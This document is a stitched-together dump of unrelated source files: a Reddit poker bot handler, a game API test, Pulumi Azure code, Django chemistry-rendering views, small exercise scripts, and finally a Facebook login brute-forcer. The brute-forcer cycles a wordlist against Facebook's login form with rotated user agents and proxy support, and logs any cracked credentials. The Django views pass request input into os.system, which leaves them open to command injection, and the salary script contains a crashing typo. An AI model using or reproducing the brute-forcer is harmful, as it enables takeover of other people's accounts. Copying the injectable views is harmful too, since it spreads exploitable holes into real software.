    user_agent = 'Dealer bot v{} by /u/eganwall'.format(version)
)
# initialize our repository and logger
sg_repo = SG_Repository.Repository()
logger = SG_Utils.LogUtility()
# get our messaging classes
error_messages = SG_Messages.ErrorMessages
reply_messages = SG_Messages.ReplyMessages
constants = SG_Messages.MiscConstants
# initialize the classes we need to run the poker game
card = deuces.Card()
evaluator = deuces.Evaluator()
def handle_message(ch, method, properties, body):
    """Process one wager message from the 'poker' queue end-to-end.

    Looks up (or creates) the player, validates the wager, plays the hand,
    persists the result, replies to the Reddit comment, and acks the
    delivery.  Every path through this function acks the message once.
    """
    # get current time for elapsed time tracking
    start_time = time.time()
    message = json.loads(body)
    # get the comment instance so we can reply to it
    comment = reddit.comment(message['comment_id'])
    # get the player from the DB so we can validate their wager
    # and update their balance
    player = sg_repo.GET_PLAYER_BY_USERNAME(comment.author.name)
    # create new player if this account hasn't played before
    if player is None:
        SG_Utils.add_new_player(comment.author.name, message['message_id'])
        player = sg_repo.GET_PLAYER_BY_USERNAME(comment.author.name)
    # now process the comment
    wager_amount = parse_post_for_wager(message['comment_body'], player['balance'])
    logger.log_info_message(message['message_id'], SG_Utils.LogUtilityConstants.wager_validated_event,
                            logger_name, '[wager_amount={}] [game_type={}]'.format(wager_amount, game_type))
    # Rejection path 1: unparseable or non-positive wager.
    if wager_amount <= 0:
        #print("Wager amount not valid")
        SG_Utils.post_comment_reply(comment, error_messages.POKER_ERROR_MSG, message['message_id'])
        ch.basic_ack(delivery_tag=method.delivery_tag)
        logger.log_info_message(message['message_id'], SG_Utils.LogUtilityConstants.wager_rejected_event,
                                logger_name, '[rejected_reason={}] [comment_id={}] [elapsed_seconds={:.3f}]'.format(
                                    SG_Utils.LogUtilityConstants.incorrect_format_reason, message['comment_id'],
                                    SG_Utils.get_elapsed_secs(comment.created_utc, time.time())))
        return
    # Rejection path 2: wager exceeds the player's balance.
    if wager_amount > player['balance']:
        #print("Player wagered more than their balance")
        SG_Utils.post_comment_reply(comment, error_messages.INSUFFICIENT_BALANCE_ERROR_MSG, message['message_id'])
        ch.basic_ack(delivery_tag=method.delivery_tag)
        logger.log_info_message(message['message_id'], SG_Utils.LogUtilityConstants.wager_rejected_event,
                                logger_name, '[rejected_reason={}] [comment_id={}] [elapsed_seconds={:.3f}]'.format(
                                    SG_Utils.LogUtilityConstants.insufficient_balance_reason, message['comment_id'],
                                    SG_Utils.get_elapsed_secs(comment.created_utc, time.time())))
        return
    # Rejection path 3: wager exceeds the table limit.
    if wager_amount > max_bet:
        #print("Player wagered more than this game's max bet")
        SG_Utils.post_comment_reply(comment, error_messages.OVER_MAX_BET_ERROR_MSG.format(max_bet), message['message_id'])
        ch.basic_ack(delivery_tag=method.delivery_tag)
        logger.log_info_message(message['message_id'], SG_Utils.LogUtilityConstants.wager_rejected_event,
                                logger_name, '[rejected_reason={}] [comment_id={}] [elapsed_seconds={:.3f}]'.format(
                                    SG_Utils.LogUtilityConstants.over_max_bet_reason, message['comment_id'],
                                    SG_Utils.get_elapsed_secs(comment.created_utc, time.time())))
        return
    # Valid wager: play the hand, settle the balance, persist, and reply.
    wager_result = play_poker(wager_amount, comment.id)
    new_player_balance = player['balance'] - wager_amount + wager_result['winnings']
    sg_repo.INSERT_WAGER(player['username'], wager_result['outcome'],
                         wager_amount, wager_result['winnings'], new_player_balance, game_type)
    SG_Utils.update_player_after_wager(player['username'], new_player_balance, player['flair_css_class'], message['message_id'])
    reply = format_wager_reply(player['username'], wager_amount, wager_result['full_hand_string'],
                               wager_result['full_board_string'],
                               wager_result['hand_type'], wager_result['outcome'], wager_result['winnings'],
                               new_player_balance)
    logger.log_info_message(message['message_id'], SG_Utils.LogUtilityConstants.wager_executed_event,
                            logger_name, '[outcome={}] [new_balance={}]'.format(wager_result['outcome'], new_player_balance))
    SG_Utils.post_comment_reply(comment, reply, message['message_id'])
    ch.basic_ack(delivery_tag=method.delivery_tag)
    logger.log_info_message(message['message_id'], SG_Utils.LogUtilityConstants.handler_finished_event,
                            logger_name, 'Handler finished fulfilling request : [comment_id={}] [elapsed_seconds={:.3f}] [processing_time={:.3f}]'.format(
                                message['comment_id'],
                                SG_Utils.get_elapsed_secs(comment.created_utc, time.time()),
                                SG_Utils.get_elapsed_secs(start_time, time.time())))
def safe_handle(ch, method, properties, body):
    """Crash-proof wrapper around handle_message: any exception is logged
    with its full stack trace and the delivery is still acked, so one bad
    message cannot wedge the queue."""
    try:
        handle_message(ch, method, properties, body)
    except Exception:
        payload = json.loads(body)
        logger.log_error_message(payload['message_id'], SG_Utils.LogUtilityConstants.exception_event,
                                 logger_name, traceback.format_exc() + "=== END OF STACK TRACE")
        ch.basic_ack(delivery_tag=method.delivery_tag)
# Wire up RabbitMQ: consume wager messages from the durable 'poker' queue.
# heartbeat_interval=0 disables heartbeats so long hand processing cannot
# drop the connection.
connection = pika.BlockingConnection(pika.ConnectionParameters('localhost', heartbeat_interval=0))
channel = connection.channel()
channel.queue_declare(queue='poker', durable=True)
channel.basic_consume(safe_handle,
                      queue='poker')
log_msg = "POKER handler started up - waiting for messages..."
logger.log_info_message('', SG_Utils.LogUtilityConstants.handler_startup_event,
                        logger_name, log_msg)
# Blocks forever, dispatching deliveries to safe_handle.
channel.start_consuming()
"egan.c.wall@gmail.com"
] | egan.c.wall@gmail.com |
f0dd3b2420a5624df7d347b967ad3514ea27823d | d83118503614bb83ad8edb72dda7f449a1226f8b | /src/dprj/platinumegg/test/sceventcastnomination/tanzaku_post.py | aeb7000b88fa6e55783a45f19b4974b7cf7135dc | [] | no_license | hitandaway100/caba | 686fe4390e182e158cd9714c90024a082deb8c69 | 492bf477ac00c380f2b2758c86b46aa7e58bbad9 | refs/heads/master | 2021-08-23T05:59:28.910129 | 2017-12-03T19:03:15 | 2017-12-03T19:03:15 | 112,512,044 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,568 | py | # -*- coding: utf-8 -*-
from platinumegg.test.base import ApiTestBase, AppTestError
from platinumegg.lib.opensocial.util import OSAUtil
from platinumegg.test.dummy_factory import DummyType
from platinumegg.test.util.scoutevent import ScoutEventTestUtil
from defines import Defines
from platinumegg.app.cabaret.util.api import BackendApi
from platinumegg.app.cabaret.util.db_util import ModelRequestMgr
class ApiTest(ApiTestBase):
"""スカウトイベント短冊投入書き込み.
"""
def setUp(self):
# 報酬.
prize = self.create_dummy(DummyType.PRIZE_MASTER, gold=100, gachapt=10)
# イベントマスター.
pointprizes = [
[1, [prize.id]],
]
event_args = dict(pointprizes=pointprizes, lovetime_star=10, lovetime_timelimit=3600)
eventstage_args = dict(execution=1000, lovetime_star_min=1)
self.__scoutevent_util = ScoutEventTestUtil(self, event_args, eventstage_args)
# 短冊.
self.__tanzakumaster = self.__scoutevent_util.create_tanzakumaster(0, [prize.id], 1)
# Player.
self.__player0 = self.__scoutevent_util.create_player()
self.__tanzakudata = self.__scoutevent_util.create_tanzakudata(self.__player0.id, tanzaku_nums={self.__tanzakumaster.number:self.__tanzakumaster.tanzaku})
# とりあえずステージを1つ追加.
self.__scoutevent_util.add_stages_by_maxnumber(1)
# イベント発生中設定.
self.__scoutevent_util.set_scoutevent_open()
def get_query_params(self):
return {
OSAUtil.KEY_OWNER_ID:self.__player0.dmmid,
}
def get_args(self):
return {
Defines.URLQUERY_ID:self.__tanzakumaster.number,
}
def check(self):
keys = (
'redirect_url',
)
for k in keys:
if self.response.get(k, None) is None:
raise AppTestError(u'%sが設定されていない' % k)
tanzakudata = BackendApi.get_scoutevent_tanzakucastdata(ModelRequestMgr(), self.__player0.id, self.__scoutevent_util.eventmaster.id)
if tanzakudata.current_cast != self.__tanzakumaster.number:
raise AppTestError(u'現在の指名キャストが正しくない')
elif tanzakudata.get_tanzaku(self.__tanzakumaster.number) != 0:
raise AppTestError(u'短冊の残り枚数が正しくない')
def finish(self):
self.__scoutevent_util.set_scoutevent_close()
| [
"shangye@mail.com"
] | shangye@mail.com |
3a06b6dd1ebce702804e9865497efe32c035f0ef | 90419da201cd4948a27d3612f0b482c68026c96f | /sdk/python/pulumi_azure_nextgen/insights/latest/favorite.py | d55a6dac0ab47d25c6e220984056f3c50b84acf8 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | test-wiz-sec/pulumi-azure-nextgen | cd4bee5d70cb0d332c04f16bb54e17d016d2adaf | 20a695af0d020b34b0f1c336e1b69702755174cc | refs/heads/master | 2023-06-08T02:35:52.639773 | 2020-11-06T22:39:06 | 2020-11-06T22:39:06 | 312,993,761 | 0 | 0 | Apache-2.0 | 2023-06-02T06:47:28 | 2020-11-15T09:04:00 | null | UTF-8 | Python | false | false | 9,210 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
__all__ = ['Favorite']
class Favorite(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
category: Optional[pulumi.Input[str]] = None,
config: Optional[pulumi.Input[str]] = None,
favorite_id: Optional[pulumi.Input[str]] = None,
favorite_type: Optional[pulumi.Input[str]] = None,
is_generated_from_template: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
resource_name_: Optional[pulumi.Input[str]] = None,
source_type: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
version: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Properties that define a favorite that is associated to an Application Insights component.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] category: Favorite category, as defined by the user at creation time.
:param pulumi.Input[str] config: Configuration of this particular favorite, which are driven by the Azure portal UX. Configuration data is a string containing valid JSON
:param pulumi.Input[str] favorite_id: The Id of a specific favorite defined in the Application Insights component
:param pulumi.Input[str] favorite_type: Enum indicating if this favorite definition is owned by a specific user or is shared between all users with access to the Application Insights component.
:param pulumi.Input[bool] is_generated_from_template: Flag denoting wether or not this favorite was generated from a template.
:param pulumi.Input[str] name: The user-defined name of the favorite.
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[str] resource_name_: The name of the Application Insights component resource.
:param pulumi.Input[str] source_type: The source of the favorite definition.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of 0 or more tags that are associated with this favorite definition
:param pulumi.Input[str] version: This instance's version of the data model. This can change as new features are added that can be marked favorite. Current examples include MetricsExplorer (ME) and Search.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['category'] = category
__props__['config'] = config
if favorite_id is None:
raise TypeError("Missing required property 'favorite_id'")
__props__['favorite_id'] = favorite_id
__props__['favorite_type'] = favorite_type
__props__['is_generated_from_template'] = is_generated_from_template
__props__['name'] = name
if resource_group_name is None:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
if resource_name_ is None:
raise TypeError("Missing required property 'resource_name_'")
__props__['resource_name'] = resource_name_
__props__['source_type'] = source_type
__props__['tags'] = tags
__props__['version'] = version
__props__['time_modified'] = None
__props__['user_id'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:insights/v20150501:Favorite")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(Favorite, __self__).__init__(
'azure-nextgen:insights/latest:Favorite',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'Favorite':
"""
Get an existing Favorite resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return Favorite(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def category(self) -> pulumi.Output[Optional[str]]:
"""
Favorite category, as defined by the user at creation time.
"""
return pulumi.get(self, "category")
@property
@pulumi.getter
def config(self) -> pulumi.Output[Optional[str]]:
"""
Configuration of this particular favorite, which are driven by the Azure portal UX. Configuration data is a string containing valid JSON
"""
return pulumi.get(self, "config")
@property
@pulumi.getter(name="favoriteId")
def favorite_id(self) -> pulumi.Output[str]:
"""
Internally assigned unique id of the favorite definition.
"""
return pulumi.get(self, "favorite_id")
@property
@pulumi.getter(name="favoriteType")
def favorite_type(self) -> pulumi.Output[Optional[str]]:
"""
Enum indicating if this favorite definition is owned by a specific user or is shared between all users with access to the Application Insights component.
"""
return pulumi.get(self, "favorite_type")
@property
@pulumi.getter(name="isGeneratedFromTemplate")
def is_generated_from_template(self) -> pulumi.Output[Optional[bool]]:
"""
Flag denoting wether or not this favorite was generated from a template.
"""
return pulumi.get(self, "is_generated_from_template")
@property
@pulumi.getter
def name(self) -> pulumi.Output[Optional[str]]:
"""
The user-defined name of the favorite.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="sourceType")
def source_type(self) -> pulumi.Output[Optional[str]]:
"""
The source of the favorite definition.
"""
return pulumi.get(self, "source_type")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of 0 or more tags that are associated with this favorite definition
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="timeModified")
def time_modified(self) -> pulumi.Output[str]:
"""
Date and time in UTC of the last modification that was made to this favorite definition.
"""
return pulumi.get(self, "time_modified")
@property
@pulumi.getter(name="userId")
def user_id(self) -> pulumi.Output[str]:
"""
Unique user id of the specific user that owns this favorite.
"""
return pulumi.get(self, "user_id")
@property
@pulumi.getter
def version(self) -> pulumi.Output[Optional[str]]:
"""
This instance's version of the data model. This can change as new features are added that can be marked favorite. Current examples include MetricsExplorer (ME) and Search.
"""
return pulumi.get(self, "version")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| [
"public@paulstack.co.uk"
] | public@paulstack.co.uk |
9d4e46266c0eeba54c377658d47edf697b79c0f3 | 72c3731ba71ed8b0d18fda32feb33f4344542608 | /api/babelconverter/views.py | 18a831d9473e9d12d94db80c6e357f1c02f08e07 | [] | no_license | AugustoCPinheiro/OpenBabelConverter | 2603b3f07a489a29c8938ee9e3cf99d9f7c78b3e | 152eabd75639f1c9c4560ea8d995b8b0435b573d | refs/heads/master | 2022-12-10T05:09:59.507063 | 2019-10-17T22:23:13 | 2019-10-17T22:23:13 | 196,431,031 | 1 | 0 | null | 2022-12-08T06:41:50 | 2019-07-11T16:35:58 | Python | UTF-8 | Python | false | false | 2,214 | py | from django.http import HttpResponseRedirect
from django.http import HttpResponse
import os
import datetime
from django.views.decorators.csrf import csrf_exempt
import json
from django.core import serializers
from babelconverter import utils
import requests
from PIL import Image
import numpy as np
@csrf_exempt
def compositeByName(request):
    """Proxy a PubChem compound lookup by name.

    Expects a JSON request body with key ``"compound-name"`` and
    forwards it to the PubChem PUG REST API, returning the raw JSON
    response body on HTTP 200, otherwise a plain 'Not working' body.
    """
    loaded = json.loads(request.body)
    # NOTE(review): the compound name is inserted into the URL without
    # percent-encoding; names containing spaces or special characters
    # will likely produce a malformed request — confirm with callers.
    r = requests.request('GET','https://pubchem.ncbi.nlm.nih.gov/rest/pug/compound/name/'+ loaded["compound-name"] +'/JSON')
    if(r.status_code == 200):
        return HttpResponse(r, content_type='application/json')
    return HttpResponse('Not working')
@csrf_exempt
def compositeImageByName(request):
    """Resolve a compound name to SMILES via PubChem and render an SVG.

    Looks up ``"compound-name"`` from the JSON body on the PubChem PUG
    REST API, extracts a SMILES string, and shells out (via
    ``utils.convert_to_command``) to draw it.  On success the response
    body is the generated file *path*, not the SVG bytes.
    """
    loaded = json.loads(request.body)
    compound_name = loaded['compound-name']
    print(compound_name)
    r = requests.request('GET','https://pubchem.ncbi.nlm.nih.gov/rest/pug/compound/name/'+ compound_name +'/JSON')
    # NOTE(review): props[18] is a positional guess at the SMILES entry;
    # PubChem's props ordering is not guaranteed — verify by label instead.
    smiles = r.json()['PC_Compounds'][0]['props'][18]['value']['sval']
    print(smiles)
    file_path = "../temp/"
    # NOTE(review): compound_name and smiles originate from the request
    # and from a remote API, and flow into os.system via a shell command
    # string — command-injection risk; prefer subprocess with a list argv.
    command = utils.convert_to_command(smiles, file_path, compound_name)
    os.system(command)
    if(r.status_code == 200):
        # Returns the path string as the body, not the SVG contents.
        return HttpResponse(file_path + compound_name +".svg", content_type="image/svg+xml")
    return HttpResponse('Not working')
@csrf_exempt
def convert(request):
    """Render a SMILES string to PNG and recolor its white background.

    Query parameters: ``smiles`` (structure to draw), ``size`` (pixel
    size, default '300') and ``background`` (hex RRGGBB, default
    '000000').  Returns the recolored PNG bytes.
    """
    smiles = request.GET.get('smiles', '')
    size = request.GET.get('size', '300')
    background = request.GET.get('background', '000000')
    composite_name = datetime.datetime.now().__str__() + "-composite"  # NOTE(review): unused
    file_path = "../temp/"
    file_name = "composite"
    # Parse "RRGGBB" into an (r, g, b) integer tuple.
    rgb = tuple(int(background[i:i+2], 16) for i in (0, 2, 4))
    # NOTE(review): smiles and size come straight from the query string
    # and reach os.system inside a shell command — command-injection risk.
    command = utils.convert_to_command(smiles, file_path, file_name)
    command = command + " -xp " + size
    print(command)
    os.system(command)
    im = Image.open(file_path + file_name +".png")
    data = np.array(im)
    # Unpacking exactly three channels assumes an RGB image; an RGBA or
    # palettized PNG would raise here — assumes Open Babel emits RGB, TODO confirm.
    red, green, blue = data.T
    white_areas = (red == 255) & (blue == 255) & (green == 255)
    print(data)
    # Recolor pure-white pixels with the requested background colour.
    data[0:][white_areas.T] = (rgb[0], rgb[1], rgb[2])
    print(data)
    im2 = Image.fromarray(data)
    im2.save(file_path + file_name + '.png', "PNG")
    # NOTE(review): fixed shared filename — concurrent requests race on
    # this file; the handle below is also never closed explicitly.
    image_data = open(file_path + file_name +".png", "rb").read()
    return HttpResponse(image_data, content_type="image/png")
| [
"augustocepinheiro@gmail.com"
] | augustocepinheiro@gmail.com |
402855c5f07be19f37f9e64bb5cec230be3bda3e | 7bb2b8a71e74e4a63a1c365ae63bc296b8daf502 | /project-euler/src/053.py | 7856ea133771b6eef557dd2be25ecd6233d5458c | [] | no_license | mseravalli/prog-pract | 3e038df2e59f8e377f9f2e4180162ed4c01cacce | 58ff9ced25b877685768003c36a0c29ad2387fe1 | refs/heads/master | 2021-01-17T09:33:24.524944 | 2013-09-16T11:42:53 | 2013-09-16T11:42:53 | 32,332,912 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 215 | py | #!/usr/bin/python
import math
# Project Euler 53: how many C(n, r), 1 <= n <= 100, exceed one million?
LIM = 100
THRESHOLD = 1000000


def count_large_selections(limit=LIM, threshold=THRESHOLD):
    """Count binomial coefficients C(n, r) greater than ``threshold``.

    Iterates n from 1 to ``limit`` inclusive and r from 0 to n.
    Uses exact integer arithmetic: the original relied on Python 2's
    integer ``/``; ``//`` is the Python 3 equivalent (the division is
    exact for binomial coefficients, so no precision is lost).
    """
    count = 0
    for n in range(1, limit + 1):
        for r in range(n + 1):
            c = math.factorial(n) // (math.factorial(r) * math.factorial(n - r))
            if c > threshold:
                count += 1
    return count


if __name__ == '__main__':
    # `print count` was Python 2 statement syntax; use the function form.
    print(count_large_selections())
| [
"marco.seravalli@gmail.com"
] | marco.seravalli@gmail.com |
cfe4bf82f8699e90bd73b3ef7cb353fc5e90bcac | ce3b5719811cbd530318590dda524ffeb7dc0c97 | /lista-de-exercicio-2/Questao12.py | 4a030ec83f3459f42bb68d9c728c086554b1f80d | [] | no_license | warleyken42/estrutura-de-dados | dbc6825d5b7a555dbed636011392ac91280ab6f5 | a039da5ab66f0e3bff779543a296a4e561ce0a51 | refs/heads/master | 2020-08-10T20:08:29.227728 | 2019-11-28T22:59:45 | 2019-11-28T22:59:45 | 160,401,593 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,123 | py | horas = int(input("Digite quanto ganha por hora: "))
quantidade_horas = int(input("Digite o numero de horas trabalhadas:"))
salario_bruto = quantidade_horas * horas
cinco_porcento = (5 / 100.0) * salario_bruto
dez_porcento = (10/ 100.0) * salario_bruto
onze_porcento = (11 / 100.0) * salario_bruto
vinte_porcento = (20 / 100.0) * salario_bruto
if salario_bruto <= 900:
print("Seu salario bruto : R$ {}".format(salario_bruto))
print("(-) IR (5%) : R$ {}".format(0))
print("(-) INSS (10%) : R$ {}".format(0))
print("FGTS (11%) : R$ {}".format(0))
print("Salário Liquido : R$ {}".format(salario_bruto))
elif salario_bruto >= 900 and salario_bruto <= 1500:
print("Seu salario bruto : R$ {}".format(salario_bruto))
print("(-) IR (5%) : R$ {}".format(cinco_porcento))
print("(-) INSS (10%) : R$ {}".format(dez_porcento))
print("FGTS (11%) : R$ {}".format(onze_porcento))
print("Total de descontos : R$ {}".format(cinco_porcento + dez_porcento))
print("Salário Liquido : R$ {}".format(salario_bruto - (cinco_porcento + dez_porcento)))
elif salario_bruto > 1500 and salario_brunto <= 2500:
print("Seu salario bruto : R$ {}".format(salario_bruto))
print("(-) IR (5%) : R$ {}".format(cinco_porcento))
print("(-) INSS (10%) : R$ {}".format(dez_porcento))
print("FGTS (11%) : R$ {}".format(onze_porcento))
print("Total de descontos : R$ {}".format(dez_porcento + dez_porcento))
print("Salário Liquido : R$ {}".format(salario_bruto - (dez_porcento + dez_porcento)))
elif salario_bruto > 2500:
print("Seu salario bruto : R$ {}".format(salario_bruto))
print("(-) IR (5%) : R$ {}".format(cinco_porcento))
print("(-) INSS (10%) : R$ {}".format(dez_porcento))
print("FGTS (11%) : R$ {}".format(onze_porcento))
print("Total de descontos : R$ {}".format(vinte_porcento + dez_porcento))
print("Salário Liquido : R$ {}".format(salario_bruto - (vinte_porcento + dez_porcento))) | [
"warley-ft@hotmail.com"
] | warley-ft@hotmail.com |
366adcdd2354b540a6cb703281de83a7f577216c | b1c07da68cfaa7d770e1ac0da1f946aca0871d69 | /facebook.py | 2d46804b2548aff63ee9dc3c1fc81cfe56b9f22d | [] | no_license | bugresearcher/Python-Tool | 191fc9e10f4d61a68db3b705dab838913983c31a | 0ca43f407c0229a437179ddd0e67e87234692970 | refs/heads/master | 2020-03-21T21:35:00.055512 | 2018-06-28T21:52:57 | 2018-06-28T21:52:57 | 139,071,762 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,982 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import re
import os
import sys
import random
import warnings
import time
try:
import mechanize
except ImportError:
print "[*] Please install mechanize python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
import cookielib
except ImportError:
print "[*] Please install cookielib python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)
# define variable
__programmer__ = "Cyb3rK!ng"
__version__ = "2.1"
verbose = False
useproxy = False
usepassproxy = False
log = 'fbbruteforcer.log'
file = open(log, "a")
success = 'http://www.facebook.com/?sk=messages&ref=mb'
fblogin = 'https://login.facebook.com/login.php?login_attempt=1'
# some cheating ..
ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
'Microsoft Internet Explorer/4.0b1 (Windows 95)',
'Opera/8.00 (Windows NT 5.1; U; en)',
'amaya/9.51 libwww/5.4.0',
'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
]
facebook = '''
__ _ _
/ _| | | | |
| |_ __ _ ___ ___| |__ ___ ___ | | __
| _/ _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ /
| || (_| | (_| __/ |_) | (_) | (_) | <
|_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\\
bruteforcer...
Programmer : %s
Version : %s''' % (__programmer__, __version__)
option = '''
Usage : %s [options]
Option : -u, --username | User for bruteforcing
-w, --wordlist | Wordlist used for bruteforcing
-v, --verbose | Set %s will be verbose
-p, --proxy | Set http proxy will be use
-k, --usernameproxy | Set username at proxy will be use
-i, --passproxy
| Set password at proxy will be use
-l, --log | Specify output filename (default : fbbruteforcer.log)
-h, --help | Print this help
Example : %s -u brad@hackme.com -w wordlist.txt"
P.S : add "&" to run in the background
''' % (sys.argv[0], sys.argv[0], sys.argv[0])
hme = '''
Usage : %s [option]
-h or --help for get help
''' % sys.argv[0]
def helpme():
print facebook
print option
file.write(facebook)
file.write(option)
sys.exit(1)
def helpmee():
print facebook
print hme
file.write(facebook)
file.write(hme)
sys.exit(1)
for arg in sys.argv:
try:
if arg.lower() == '-u' or arg.lower() == '--user':
username = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-l' or arg.lower() == '--log':
log = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-p' or arg.lower() == '--proxy':
useproxy = True
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-k' or arg.lower() == '--userproxy':
usepassproxy = True
usw = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-i' or arg.lower() == '--passproxy':
usepassproxy = True
usp = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-v' or arg.lower() == '--verbose':
verbose = True
elif arg.lower() == '-h' or arg.lower() == '--help':
helpme()
elif len(sys.argv) <= 1:
helpmee()
except IOError:
helpme()
except NameError:
helpme()
except IndexError:
helpme()
def bruteforce(word):
try:
sys.stdout.write("\r[*] Trying %s... " % word)
file.write("[*] Trying %s\n" % word)
sys.stdout.flush()
br.addheaders = [('User-agent', random.choice(ouruseragent))]
opensite = br.open(fblogin)
br.select_form(nr=0)
br.form['email'] = username
br.form['pass'] = word
br.submit()
response = br.response().read()
if verbose:
print response
if success in response:
print "\n\n[*] Logging in success..."
print "[*] Username : %s" % (username)
print "[*] Password : %s\n" % (word)
file.write("\n[*] Logging in success...")
file.write("\n[*] Username : %s" % (username))
file.write("\n[*] Password : %s\n\n" % (word))
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
except mechanize._mechanize.FormNotFoundError:
print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
sys.exit(1)
except mechanize._form.ControlNotFoundError:
print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
sys.exit(1)
def releaser():
global word
for word in words:
bruteforce(word.replace("\n",""))
def main():
global br
global words
try:
br = mechanize.Browser()
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_debug_http(False)
br.set_debug_redirects(False)
br.set_debug_redirects(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
if useproxy:
br.set_proxies({"http": proxy})
if usepassproxy:
br.add_proxy_password(usw, usp)
if verbose:
br.set_debug_http(True)
br.set_debug_redirects(True)
br.set_debug_redirects(True)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
file.write("\n[*] Exiting program...\n")
sys.exit(1)
try:
preventstrokes = open(wordlist, "r")
words = preventstrokes.readlines()
count = 0
while count < len(words):
words[count] = words[count].strip()
count += 1
except IOError:
print "\n[*] Error: Check your wordlist path\n"
file.write("\n[*] Error: Check your wordlist path\n")
sys.exit(1)
except NameError:
helpme()
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
file.write("\n[*] Exiting program...\n")
sys.exit(1)
try:
print facebook
